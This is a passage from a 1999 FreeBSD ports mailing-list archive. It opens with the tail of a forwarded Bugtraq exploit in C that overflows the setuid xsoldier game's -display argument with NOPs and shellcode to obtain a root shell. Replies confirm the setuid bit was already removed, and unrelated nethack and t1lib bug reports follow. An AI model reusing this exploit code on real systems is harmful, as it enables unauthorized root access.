fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n"); fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4325; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize]='\0'; execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL); } ------- Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier@usa.net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1 ------- end of forwarded message ------- -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 20: 3:11 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id 6B0201544D for ; Wed, 15 Dec 1999 20:03:05 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.03 #1) id 11yS86-000Oit-00; Wed, 15 Dec 1999 22:03:02 -0600 Date: Wed, 15 Dec 1999 22:03:02 -0600 From: Ade Lovett To: Spidey Cc: ports@freebsd.org Subject: Re: Fwd: FreeBSD 3.3 xsoldier root exploit Message-ID: <19991215220302.F93091@lovett.com> References: <14424.25185.473372.422010@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14424.25185.473372.422010@anarcat.dyndns.org>; from beaupran@iro.umontreal.ca on Wed, Dec 15, 1999 at 10:54:09PM -0500 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 15, 1999 at 10:54:09PM -0500, Spidey wrote: > > Hi. Some buddy here thought it to be a good idea to scrap FBSD's > reputation on Bugtraq, and it's going well. > > It's not the first time he posts about an exploit on a program part of > the ports... > > [snip] > > For now, it would be a _great_ idea to scrap the setuid bit on that > darn xsoldier. :) It was - earlier this evening: http://www.freebsd.org/cgi/cvsweb.cgi/ports/games/xsoldier/patches/patch-ac -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 20:13:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from anarcat.dyndns.org (phobos.IRO.UMontreal.CA [132.204.20.20]) by hub.freebsd.org (Postfix) with ESMTP id A124415499 for ; Wed, 15 Dec 1999 20:13:11 -0800 (PST) (envelope-from spidey@anarcat.dyndns.org) Received: by anarcat.dyndns.org (Postfix, from userid 1000) id 3DB731B33; Wed, 15 Dec 1999 23:13:26 -0500 (EST) From: Spidey MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <14424.26341.863895.422806@anarcat.dyndns.org> Date: Wed, 15 Dec 1999 23:13:25 -0500 (EST) To: Ade Lovett Cc: ports@freebsd.org Subject: Re: Fwd: FreeBSD 3.3 xsoldier root exploit References: <14424.25185.473372.422010@anarcat.dyndns.org> <19991215220302.F93091@lovett.com> X-Mailer: VM 6.72 under 21.1 (patch 7) "Biscayne" XEmacs Lucid Reply-To: Spidey Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darn.. the guy contacted you? I thought that there were no modifications made to the port by looking at http://www.freebsd.org/cgi/ports.cgi?type=changed&time=24+month+ago&sektion=games guess I don't look at the good place. Thanks a lot. --- Big Brother told Ade Lovett to write, at 22:03 of December 15: > On Wed, Dec 15, 1999 at 10:54:09PM -0500, Spidey wrote: > > > > Hi. Some buddy here thought it to be a good idea to scrap FBSD's > > reputation on Bugtraq, and it's going well. > > > > It's not the first time he posts about an exploit on a program part of > > the ports... > > > > [snip] > > > > For now, it would be a _great_ idea to scrap the setuid bit on that > > darn xsoldier. :) > > It was - earlier this evening: > > http://www.freebsd.org/cgi/cvsweb.cgi/ports/games/xsoldier/patches/patch-ac > > -aDe > > -- > Ade Lovett, Austin, TX. -- Si l'image donne l'illusion de savoir C'est que l'adage pretend que pour croire, L'important ne serait que de voir Lofofora To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Wed Dec 15 20:16:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from viper.lovett.com (viper.lovett.com [216.60.121.173]) by hub.freebsd.org (Postfix) with ESMTP id C9572154B2 for ; Wed, 15 Dec 1999 20:16:36 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by viper.lovett.com with local (Exim 3.03 #1) id 11ySLB-000OlH-00; Wed, 15 Dec 1999 22:16:33 -0600 Date: Wed, 15 Dec 1999 22:16:33 -0600 From: Ade Lovett To: Spidey Cc: ports@freebsd.org Subject: Re: Fwd: FreeBSD 3.3 xsoldier root exploit Message-ID: <19991215221633.A95095@lovett.com> References: <14424.25185.473372.422010@anarcat.dyndns.org> <19991215220302.F93091@lovett.com> <14424.26341.863895.422806@anarcat.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i In-Reply-To: <14424.26341.863895.422806@anarcat.dyndns.org>; from beaupran@iro.umontreal.ca on Wed, Dec 15, 1999 at 11:13:25PM -0500 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Dec 15, 1999 at 11:13:25PM -0500, Spidey wrote: > Darn.. the guy contacted you? Nope - I had nothing to do with it :) I just happened to be reading bugtraq and cvs-all this evening, saw the announcement, then the commit from Satoshi via Warner. Exceptionally impressive speed there, too. -aDe -- Ade Lovett, Austin, TX. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 0:22:45 1999 Delivered-To: freebsd-ports@freebsd.org Received: from parodius.com (pentarou.parodius.com [205.149.163.62]) by hub.freebsd.org (Postfix) with ESMTP id 02C8C15495 for ; Thu, 16 Dec 1999 00:22:44 -0800 (PST) (envelope-from yoshi@parodius.com) Received: (from yoshi@localhost) by parodius.com (8.9.3/8.9.3) id AAA16770 for ports@FreeBSD.org; Thu, 16 Dec 1999 00:27:23 GMT (envelope-from yoshi) Date: Thu, 16 Dec 1999 00:27:23 +0000 From: Jeremy Chadwick To: ports@FreeBSD.org Subject: ports/games/nethack -- Not Y2K compliant Message-ID: <19991216002723.A16729@parodius.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i X-Organization: Parodius Networking Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Any chance of seeing nethack-3.3.0 making it into ports/ before 3.4-STABLE or 4.0-STABLE? According to http://www.nethack.org/, there is a Y2K compliancy issue with nethack 3.2.2 and below. I happen to think this is pretty important, even though nethack is just for entertainment. I could not get 3.3.0 to run (after about an hour of hacking on the source, I got it to compile but segfaulted in libtermcap), but I'm sure there's something I'm missing as far as getting it to work. Also related, it would be greatly appreciated if one could make a tty-only version of nethack; not all of us have X installed, you know ;-). Any word on all of this? Thanks. -- | Jeremy Chadwick yoshi@parodius.com | | Parodius Networking yoshi@dreamscape.org | | UNIX System Administrator http://www.parodius.com/ | | "Linux is only free if your time has no value." - Jamie Zawinski | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 3:50: 4 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id ED14B155DC for ; Thu, 16 Dec 1999 03:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA28712; Thu, 16 Dec 1999 03:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C5CB914F70; Thu, 16 Dec 1999 03:45:52 -0800 (PST) Message-Id: <19991216114552.C5CB914F70@hub.freebsd.org> Date: Thu, 16 Dec 1999 03:45:52 -0800 (PST) From: jay.krell@cornell.edu To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15514: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15514 >Category: ports >Synopsis: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 03:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Jay Krell >Release: 3.4-RC >Organization: >Environment: FreeBSD jayk-home1bsd 3.4-RC FreeBSD 3.4-RC #0: Mon Dec 13 14:24:45 PST 1999 jayk@jayk-home1bsd:/usr/src/sys/compile/JAYK1 i386 >Description: hangs in ./configure on the line that says checking whether external symbols need an underscore prefix >How-To-Repeat: cd /usr/ports/devel/t1lib make clean make >Fix: unknown >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 4:20: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1662F1537D for ; Thu, 16 Dec 1999 04:20:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id EAA33038; Thu, 16 Dec 1999 04:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Thu, 16 Dec 1999 04:20:02 -0800 (PST) Message-Id: <199912161220.EAA33038@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: "Jay Krell" Subject: Re: ports/15514: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix Reply-To: "Jay Krell" Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15514; it has been noted by GNATS. From: "Jay Krell" To: , "Jay Krell" Cc: Subject: Re: ports/15514: /usr/ports/devel/t1lib hangs in configure, checking whether external symbols need an underscore prefix Date: Thu, 16 Dec 1999 04:15:05 -0800 This is a multi-part message in MIME format. ------=_NextPart_000_00F4_01BF477C.215971D0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit This doesn't repro if you do cd /usr/ports/devel/t1lib make clean make extract make patch cd work/T* ./configure but still definitely does repro with cd /usr/ports/devel/t1lib make clean make I'm still a little too newbieish to debug this (if only it was C++ I could step through with Visual C++..) The results of make 2>&1 > t1lib.log are attached. - Jay ------=_NextPart_000_00F4_01BF477C.215971D0 Content-Type: application/octet-stream; name="t1lib.log" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="t1lib.log" PT09PiAgRXh0cmFjdGluZyBmb3IgdDFsaWItMC45LjIKPj4gQ2hlY2tzdW0gT0sgZm9yIHQxbGli LTAuOS4yLnRhci5nei4KPT09PiAgIHQxbGliLTAuOS4yIGRlcGVuZHMgb24gZXhlY3V0YWJsZTog Z21ha2UgLSBmb3VuZAo9PT0+ICBQYXRjaGluZyBmb3IgdDFsaWItMC45LjIKPT09PiAgQ29uZmln dXJpbmcgZm9yIHQxbGliLTAuOS4yCmNyZWF0aW5nIGNhY2hlIC4vY29uZmlnLmNhY2hlCmNoZWNr aW5nIHdoZXRoZXIgbWFrZSBzZXRzICR7TUFLRX0uLi4geWVzCmNoZWNraW5nIGZvciBnY2MuLi4g Y2MKY2hlY2tpbmcgd2hldGhlciB0aGUgQyBjb21waWxlciAoY2MgLU8gLXBpcGUgKSB3b3Jrcy4u LiB5ZXMKY2hlY2tpbmcgd2hldGhlciB0aGUgQyBjb21waWxlciAoY2MgLU8gLXBpcGUgKSBpcyBh IGNyb3NzLWNvbXBpbGVyLi4uIG5vCmNoZWNraW5nIHdoZXRoZXIgd2UgYXJlIHVzaW5nIEdOVSBD Li4uIHllcwpjaGVja2luZyB3aGV0aGVyIGNjIGFjY2VwdHMgLWcuLi4geWVzCmNoZWNraW5nIGhv dyB0byBydW4gdGhlIEMgcHJlcHJvY2Vzc29yLi4uIGNjIC1FCmNoZWNraW5nIGZvciBYLi4uIGxp YnJhcmllcyAvdXNyL1gxMVI2L2xpYiwgaGVhZGVycyAvdXNyL1gxMVI2L2luY2x1ZGUKY2hlY2tp bmcgZm9yIGRuZXRfbnRvYSBpbiAtbGRuZXQuLi4gbm8KY2hlY2tpbmcgZm9yIGRuZXRfbnRvYSBp biAtbGRuZXRfc3R1Yi4uLiBubwpjaGVja2luZyBmb3IgZ2V0aG9zdGJ5bmFtZS4uLiB5ZXMKY2hl Y2tpbmcgZm9yIGNvbm5lY3QuLi4geWVzCmNoZWNraW5nIGZvciByZW1vdmUuLi4geWVzCmNoZWNr aW5nIGZvciBzaG1hdC4uLiB5ZXMKY2hlY2tpbmcgZm9yIEljZUNvbm5lY3Rpb25OdW1iZXIgaW4g LWxJQ0UuLi4geWVzCmNoZWNraW5nIGZvciBBdGhlbmEuLi4gbGlicmFyaWVzIGluIGRlZmF1bHQg cGF0aCwgaGVhZGVycyBpbiBkZWZhdWx0IHBhdGgKY2hlY2tpbmcgaG9zdCBzeXN0ZW0gdHlwZS4u LiBpMzg2LS1mcmVlYnNkMy40CmNoZWNraW5nIGZvciByYW5saWIuLi4gcmFubGliCmNoZWNraW5n IGZvciBsZCB1c2VkIGJ5IEdDQy4uLiAvdXNyL2xpYmV4ZWMvZWxmL2xkCmNoZWNraW5nIGlmIHRo ZSBsaW5rZXIgKC91c3IvbGliZXhlYy9lbGYvbGQpIGlzIEdOVSBsZC4uLiB5ZXMKY2hlY2tpbmcg Zm9yIEJTRC1jb21wYXRpYmxlIG5tLi4uIC91c3IvYmluL25tIC1CCmNoZWNraW5nIHdoZXRoZXIg bG4gLXMgd29ya3MuLi4geWVzCmNoZWNraW5nIGZvciBvYmplY3Qgc3VmZml4Li4uIG8KY2hlY2tp bmcgZm9yIGV4ZWN1dGFibGUgc3VmZml4Li4uIG5vCmNoZWNraW5nIGZvciBjYyBvcHRpb24gdG8g cHJvZHVjZSBQSUMuLi4gLWZQSUMKY2hlY2tpbmcgaWYgY2MgUElDIGZsYWcgLWZQSUMgd29ya3Mu Li4geWVzCmNoZWNraW5nIGlmIGNjIHN1cHBvcnRzIC1jIC1vIGZpbGUuby4uLiB5ZXMKY2hlY2tp bmcgaWYgY2Mgc3VwcG9ydHMgLWMgLW8gZmlsZS5sby4uLiB5ZXMKY2hlY2tpbmcgaWYgY2Mgc3Vw cG9ydHMgLWZuby1ydHRpIC1mbm8tZXhjZXB0aW9ucyAuLi4gbm8KY2hlY2tpbmcgaWYgY2Mgc3Rh dGljIGZsYWcgLXN0YXRpYyB3b3Jrcy4uLiAtc3RhdGljCmNoZWNraW5nIGlmIHRoZSBsaW5rZXIg KC91c3IvbGliZXhlYy9lbGYvbGQpIGlzIEdOVSBsZC4uLiB5ZXMKY2hlY2tpbmcgd2hldGhlciB0 aGUgbGlua2VyICgvdXNyL2xpYmV4ZWMvZWxmL2xkKSBzdXBwb3J0cyBzaGFyZWQgbGlicmFyaWVz Li4uIHllcwpjaGVja2luZyBjb21tYW5kIHRvIHBhcnNlIC91c3IvYmluL25tIC1CIG91dHB1dC4u LiBvawpjaGVja2luZyBob3cgdG8gaGFyZGNvZGUgbGlicmFyeSBwYXRocyBpbnRvIHByb2dyYW1z Li4uIGltbWVkaWF0ZQpjaGVja2luZyBmb3IgL3Vzci9saWJleGVjL2VsZi9sZCBvcHRpb24gdG8g cmVsb2FkIG9iamVjdCBmaWxlcy4uLiAtcgpjaGVja2luZyBkeW5hbWljIGxpbmtlciBjaGFyYWN0 ZXJpc3RpY3MuLi4gZnJlZWJzZDMuNCBsZC5zbwpjaGVja2luZyBpZiBsaWJ0b29sIHN1cHBvcnRz IHNoYXJlZCBsaWJyYXJpZXMuLi4geWVzCmNoZWNraW5nIHdoZXRoZXIgdG8gYnVpbGQgc2hhcmVk IGxpYnJhcmllcy4uLiB5ZXMKY2hlY2tpbmcgd2hldGhlciB0byBidWlsZCBzdGF0aWMgbGlicmFy aWVzLi4uIHllcwpjaGVja2luZyBmb3Igb2JqZGlyLi4uIC5saWJzCmNyZWF0aW5nIGxpYnRvb2wK Y2hlY2tpbmcgZm9yIGEgQlNEIGNvbXBhdGlibGUgaW5zdGFsbC4uLiAvdXNyL2Jpbi9pbnN0YWxs IC1jIC1vIHJvb3QgLWcgd2hlZWwKY2hlY2tpbmcgd2hldGhlciBjaGFyIGlzIHVuc2lnbmVkLi4u IG5vCmNoZWNraW5nIHNpemUgb2YgY2hhci4uLiAxCmNoZWNraW5nIHNpemUgb2Ygc2hvcnQuLi4g MgpjaGVja2luZyBzaXplIG9mIGludC4uLiA0CmNoZWNraW5nIHNpemUgb2YgbG9uZy4uLiA0CmNo ZWNraW5nIHNpemUgb2YgbG9uZyBsb25nLi4uIDgKY2hlY2tpbmcgc2l6ZSBvZiBmbG9hdC4uLiA0 CmNoZWNraW5nIHNpemUgb2YgZG91YmxlLi4uIDgKY2hlY2tpbmcgc2l6ZSBvZiBsb25nIGRvdWJs ZS4uLiAxMgpjaGVja2luZyBzaXplIG9mIHZvaWQgKi4uLiA0CmNoZWNraW5nIGZvciBnY2Mgc3Ry ZW5ndGgtcmVkdWNlIGJ1Zy4uLiBubwpjaGVja2luZyB3aGV0aGVyIGV4dGVybmFsIHN5bWJvbHMg bmVlZCBhbiB1bmRlcnNjb3JlIHByZWZpeC4uLiA9PT0+ICBTY3JpcHQgImNvbmZpZ3VyZSIgZmFp bGVkOiBoZXJlIGFyZSB0aGUgY29udGVudHMgb2YgImNvbmZpZy5sb2ciClRoaXMgZmlsZSBjb250 YWlucyBhbnkgbWVzc2FnZXMgcHJvZHVjZWQgYnkgY29tcGlsZXJzIHdoaWxlCnJ1bm5pbmcgY29u ZmlndXJlLCB0byBhaWQgZGVidWdnaW5nIGlmIGNvbmZpZ3VyZSBtYWtlcyBhIG1pc3Rha2UuCgpj b25maWd1cmU6NjY1OiBjaGVja2luZyB3aGV0aGVyIG1ha2Ugc2V0cyAke01BS0V9CmNvbmZpZ3Vy ZTo2OTQ6IGNoZWNraW5nIGZvciBnY2MKY29uZmlndXJlOjgwNzogY2hlY2tpbmcgd2hldGhlciB0 aGUgQyBjb21waWxlciAoY2MgLU8gLXBpcGUgKSB3b3Jrcwpjb25maWd1cmU6ODIzOiBjYyAtbyBj b25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgIDE+JjUKY29uZmlndXJlOjg0OTogY2hlY2tp bmcgd2hldGhlciB0aGUgQyBjb21waWxlciAoY2MgLU8gLXBpcGUgKSBpcyBhIGNyb3NzLWNvbXBp bGVyCmNvbmZpZ3VyZTo4NTQ6IGNoZWNraW5nIHdoZXRoZXIgd2UgYXJlIHVzaW5nIEdOVSBDCmNv bmZpZ3VyZTo4NjM6IGNjIC1FIGNvbmZ0ZXN0LmMKY29uZmlndXJlOjg4MjogY2hlY2tpbmcgd2hl dGhlciBjYyBhY2NlcHRzIC1nCmNvbmZpZ3VyZTo5MTQ6IGNoZWNraW5nIGhvdyB0byBydW4gdGhl IEMgcHJlcHJvY2Vzc29yCmNvbmZpZ3VyZTo5MzU6IGNjIC1FICBjb25mdGVzdC5jID4vZGV2L251 bGwgMj5jb25mdGVzdC5vdXQKY29uZmlndXJlOjk5ODogY2hlY2tpbmcgZm9yIFgKY29uZmlndXJl OjEzMTI6IGNoZWNraW5nIGZvciBkbmV0X250b2EgaW4gLWxkbmV0CmNvbmZpZ3VyZToxMzMxOiBj YyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgLWxkbmV0ICAgMT4mNQovdXNyL2xp YmV4ZWMvZWxmL2xkOiBjYW5ub3Qgb3BlbiAtbGRuZXQ6IE5vIHN1Y2ggZmlsZSBvciBkaXJlY3Rv cnkKY29uZmlndXJlOiBmYWlsZWQgcHJvZ3JhbSB3YXM6CiNsaW5lIDEzMjAgImNvbmZpZ3VyZSIK I2luY2x1ZGUgImNvbmZkZWZzLmgiCi8qIE92ZXJyaWRlIGFueSBnY2MyIGludGVybmFsIHByb3Rv dHlwZSB0byBhdm9pZCBhbiBlcnJvci4gICovCi8qIFdlIHVzZSBjaGFyIGJlY2F1c2UgaW50IG1p Z2h0IG1hdGNoIHRoZSByZXR1cm4gdHlwZSBvZiBhIGdjYzIKICAgIGJ1aWx0aW4gYW5kIHRoZW4g aXRzIGFyZ3VtZW50IHByb3RvdHlwZSB3b3VsZCBzdGlsbCBhcHBseS4gICovCmNoYXIgZG5ldF9u dG9hKCk7CgppbnQgbWFpbigpIHsKZG5ldF9udG9hKCkKOyByZXR1cm4gMDsgfQpjb25maWd1cmU6 MTM1MzogY2hlY2tpbmcgZm9yIGRuZXRfbnRvYSBpbiAtbGRuZXRfc3R1Ygpjb25maWd1cmU6MTM3 MjogY2MgLW8gY29uZnRlc3QgLU8gLXBpcGUgICBjb25mdGVzdC5jIC1sZG5ldF9zdHViICAgMT4m NQovdXNyL2xpYmV4ZWMvZWxmL2xkOiBjYW5ub3Qgb3BlbiAtbGRuZXRfc3R1YjogTm8gc3VjaCBm aWxlIG9yIGRpcmVjdG9yeQpjb25maWd1cmU6IGZhaWxlZCBwcm9ncmFtIHdhczoKI2xpbmUgMTM2 MSAiY29uZmlndXJlIgojaW5jbHVkZSAiY29uZmRlZnMuaCIKLyogT3ZlcnJpZGUgYW55IGdjYzIg aW50ZXJuYWwgcHJvdG90eXBlIHRvIGF2b2lkIGFuIGVycm9yLiAgKi8KLyogV2UgdXNlIGNoYXIg YmVjYXVzZSBpbnQgbWlnaHQgbWF0Y2ggdGhlIHJldHVybiB0eXBlIG9mIGEgZ2NjMgogICAgYnVp bHRpbiBhbmQgdGhlbiBpdHMgYXJndW1lbnQgcHJvdG90eXBlIHdvdWxkIHN0aWxsIGFwcGx5LiAg Ki8KY2hhciBkbmV0X250b2EoKTsKCmludCBtYWluKCkgewpkbmV0X250b2EoKQo7IHJldHVybiAw OyB9CmNvbmZpZ3VyZToxNDAxOiBjaGVja2luZyBmb3IgZ2V0aG9zdGJ5bmFtZQpjb25maWd1cmU6 MTQyOTogY2MgLW8gY29uZnRlc3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3Vy ZToxNDk5OiBjaGVja2luZyBmb3IgY29ubmVjdApjb25maWd1cmU6MTUyNzogY2MgLW8gY29uZnRl c3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3VyZToxNTkxOiBjaGVja2luZyBm b3IgcmVtb3ZlCmNvbmZpZ3VyZToxNjE5OiBjYyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0 ZXN0LmMgIDE+JjUKY29uZmlndXJlOjE2ODM6IGNoZWNraW5nIGZvciBzaG1hdApjb25maWd1cmU6 MTcxMTogY2MgLW8gY29uZnRlc3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3Vy ZToxNzg0OiBjaGVja2luZyBmb3IgSWNlQ29ubmVjdGlvbk51bWJlciBpbiAtbElDRQpjb25maWd1 cmU6MTgwMzogY2MgLW8gY29uZnRlc3QgLU8gLXBpcGUgICAtTC91c3IvWDExUjYvbGliIGNvbmZ0 ZXN0LmMgLWxJQ0UgICAxPiY1CmNvbmZpZ3VyZToxODU1OiBjaGVja2luZyBmb3IgQXRoZW5hCmNv bmZpZ3VyZToxODg2OiBjYyAtYyAgLUkvdXNyL1gxMVI2L2luY2x1ZGUgLU8gLXBpcGUgIC1JL3Vz ci9YMTFSNi9pbmNsdWRlICBjb25mdGVzdC5jIDE+JjUKY29uZmlndXJlOjE5NjA6IGNjIC1vIGNv bmZ0ZXN0ICAtSS91c3IvWDExUjYvaW5jbHVkZSAtTyAtcGlwZSAgLUkvdXNyL1gxMVI2L2luY2x1 ZGUgICAtTC91c3IvWDExUjYvbGliICBjb25mdGVzdC5jICAtbFNNIC1sSUNFIC1sWGF3IC1sWG11 IC1sWGV4dCAtbFh0IC1sWDExICAgMT4mNQpjb25maWd1cmU6MjA4NzogY2hlY2tpbmcgaG9zdCBz eXN0ZW0gdHlwZQpjb25maWd1cmU6MjExMDogY2hlY2tpbmcgZm9yIHJhbmxpYgpjb25maWd1cmU6 MjE1MDogY2hlY2tpbmcgZm9yIGxkIHVzZWQgYnkgR0NDCmNvbmZpZ3VyZToyMjA3OiBjaGVja2lu ZyBpZiB0aGUgbGlua2VyICgvdXNyL2xpYmV4ZWMvZWxmL2xkKSBpcyBHTlUgbGQKR05VIGxkIHZl cnNpb24gMi45LjEgKHdpdGggQkZEIDIuOS4xKQpjb25maWd1cmU6MjIyMzogY2hlY2tpbmcgZm9y IEJTRC1jb21wYXRpYmxlIG5tCmNvbmZpZ3VyZToyMjYwOiBjaGVja2luZyB3aGV0aGVyIGxuIC1z IHdvcmtzCmNvbmZpZ3VyZToyMzM4OiBjaGVja2luZyBmb3IgYSBCU0QgY29tcGF0aWJsZSBpbnN0 YWxsCmNvbmZpZ3VyZToyMzkzOiBjaGVja2luZyB3aGV0aGVyIGNoYXIgaXMgdW5zaWduZWQKY29u ZmlndXJlOjI0NTY6IGNoZWNraW5nIHNpemUgb2YgY2hhcgpjb25maWd1cmU6MjQ3NTogY2MgLW8g Y29uZnRlc3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3VyZToyNDk1OiBjaGVj a2luZyBzaXplIG9mIHNob3J0CmNvbmZpZ3VyZToyNTE0OiBjYyAtbyBjb25mdGVzdCAtTyAtcGlw ZSAgIGNvbmZ0ZXN0LmMgIDE+JjUKY29uZmlndXJlOjI1MzQ6IGNoZWNraW5nIHNpemUgb2YgaW50 CmNvbmZpZ3VyZToyNTUzOiBjYyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgIDE+ JjUKY29uZmlndXJlOjI1NzM6IGNoZWNraW5nIHNpemUgb2YgbG9uZwpjb25maWd1cmU6MjU5Mjog Y2MgLW8gY29uZnRlc3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3VyZToyNjEy OiBjaGVja2luZyBzaXplIG9mIGxvbmcgbG9uZwpjb25maWd1cmU6MjYzMTogY2MgLW8gY29uZnRl c3QgLU8gLXBpcGUgICBjb25mdGVzdC5jICAxPiY1CmNvbmZpZ3VyZToyNjUxOiBjaGVja2luZyBz aXplIG9mIGZsb2F0CmNvbmZpZ3VyZToyNjcwOiBjYyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNv bmZ0ZXN0LmMgIDE+JjUKY29uZmlndXJlOjI2OTA6IGNoZWNraW5nIHNpemUgb2YgZG91YmxlCmNv bmZpZ3VyZToyNzA5OiBjYyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgIDE+JjUK Y29uZmlndXJlOjI3Mjk6IGNoZWNraW5nIHNpemUgb2YgbG9uZyBkb3VibGUKY29uZmlndXJlOjI3 NDg6IGNjIC1vIGNvbmZ0ZXN0IC1PIC1waXBlICAgY29uZnRlc3QuYyAgMT4mNQpjb25maWd1cmU6 Mjc2ODogY2hlY2tpbmcgc2l6ZSBvZiB2b2lkICoKY29uZmlndXJlOjI3ODc6IGNjIC1vIGNvbmZ0 ZXN0IC1PIC1waXBlICAgY29uZnRlc3QuYyAgMT4mNQpjb25maWd1cmU6MjgxMjogY2hlY2tpbmcg Zm9yIGdjYyBzdHJlbmd0aC1yZWR1Y2UgYnVnCmNvbmZpZ3VyZToyODMxOiBjYyAtbyBjb25mdGVz dCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgIDE+JjUKY29uZmlndXJlOjI4NTQ6IGNoZWNraW5nIHdo ZXRoZXIgZXh0ZXJuYWwgc3ltYm9scyBuZWVkIGFuIHVuZGVyc2NvcmUgcHJlZml4CmNvbmZpZ3Vy ZToyODczOiBjYyAtbyBjb25mdGVzdCAtTyAtcGlwZSAgIGNvbmZ0ZXN0LmMgY29uZnRlc3RfYXNt LnMgIDE+JjUKKGVuZCBvZiAiY29uZmlnLmxvZyIpCg== ------=_NextPart_000_00F4_01BF477C.215971D0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 6:50: 7 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id F3103155BB for ; Thu, 16 Dec 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA98527; Thu, 16 Dec 1999 06:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) 